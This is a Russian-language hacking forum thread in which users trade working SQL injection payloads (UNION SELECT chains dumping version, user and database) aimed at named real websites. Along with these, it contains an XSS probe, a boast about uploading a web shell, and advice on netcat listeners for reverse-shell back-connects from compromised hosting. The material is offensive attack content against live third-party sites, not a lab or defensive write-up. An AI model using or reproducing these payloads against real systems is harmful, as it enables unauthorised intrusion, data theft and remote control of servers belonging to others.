Хм... А что ты собрался делать? Я так понимаю в этой папке лежат ключи, которые позволяют пользователям сайта/ов заходить на них, используя зашифрованное соединение ssl - это когда в адресной строке не http:// а https://. В этом случае трафик шифруется. Ключи выдаются специальными, уполномоченными на то, центрами сертификации. Наличие сертификата сервера, если я не ошибаюсь, позволяет тебе провести атаку "человек по середине". Но не думаю, что если ты задаешь подобный вопрос, то тебе оно надо...
Помогите разобраться! Запрос такой ?cu=TT<script>alert('ok')</script> вылитело окно -- ок На странице появилось Error in query SELECT qnty_ FROM currency WHERE crncy='TT' ORDER BY date_ DESC LIMIT 1 1064: You have an error in your SQL syntax near 'ok')' ORDER BY date_ DESC LIMIT 1' at line 1 Вот мучаю скуль и никак пройти в перед не могу. через order+by показывает 1 поле. ?cu=TT%27+union+select+111/* You have an error in your SQL syntax near 'union select 111/*' ORDER BY date_ DESC LIMIT 1' at line 1 ?cu=TT%27%2520union%2520select%2520null/* Unknown column '20union' in 'where clause' ?cu=TT%27+and+(select+111)/* You have an error in your SQL syntax near 'select 111)/*' ORDER BY date_ DESC LIMIT 1' at line 1
здесь проблема в другом. /* -- # без разници ошибка одна и таже. как я понял тут только подзапросами можно. но никак немогу и их использовать.
=> You have an error in your SQL syntax near 'ok')' ORDER BY date_ DESC LIMIT 1' at line 1 => "через order+by показывает 1 поле." mysql 3* => You have an error in your SQL syntax near 'union select 111/*' ORDER BY date_ DESC LIMIT 1' at line 1 mysql 3* => You have an error in your SQL syntax near 'select 111)/*' ORDER BY date_ DESC LIMIT 1' at line 1 хекерская догадка 45% (с)
Code: http://www.prazdnik.by/calendar/?day=-1%27 Вот, инъекция есть, но немогу расковырять, чтобы не запрашивал не работает Code: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Март')))) ORDER BY BE.SORT asc' at line 1]
Code: http://www.prazdnik.by/calendar/?day=-12'))))+union+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47--+&month=3&year=2009
о, спасибо большое, сам бы ни за что не догадался, я за всю жизнь ток 1 инъекцию сделал, даже шелл залил оО, спс
Это ниже 4 версии или я не правильно подобрал кол. выводимых колонок, потому как union не канает? http://flb.ru/?path=81&message_id=40+group+by+8--+
возможно какая то фильтрация : PHP: http://flb.ru/?path=81&message_id=123+union%0Aselect+1,2,3,4,concat_ws(0x3A,user(),version(),database()),6,7,8--+
собственна давно интересует ламерский вопрос . есть два ресурса( хостинга ) на обоих у меня залиты шеллы 1. 2. вот собственна ... А теперь вопрос - как пользоваться NetCat если у меня не выделенный айпи Есть хостинг покупной,Смотрел видео как коннектятся через Putty на домен ,ожидают бек коннекта ,биндят в шелле порт и подключаются и как там работает неткат . Попробовал на своем хосте на firstvds.ru - не работает . Нигде фака по инсталлу на сервер нетката не нашел поиск не рулит. И второй вопрос - какой софт под эти оси нужен? В обоих сервисах есть права на запись . Нужен root. Спасибо.
бери ссх(можно попросить у знакомых, если нету), и там неткат на прослушку порта(nc -l -p порт ) и бекконекти (я через шелл от рст это делаю) А вот если на ссх нетката нету, то не обязательно устанавливать, можно скомпилить и запускать потом ./netcat -l -p порт
http://www.theglobalreport.org/print.php?news_id=100' Блин опять запариваюсь на скуле Помогите с подбором
http://www.theglobalreport.org/print.php?news_id=-100'+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+--+
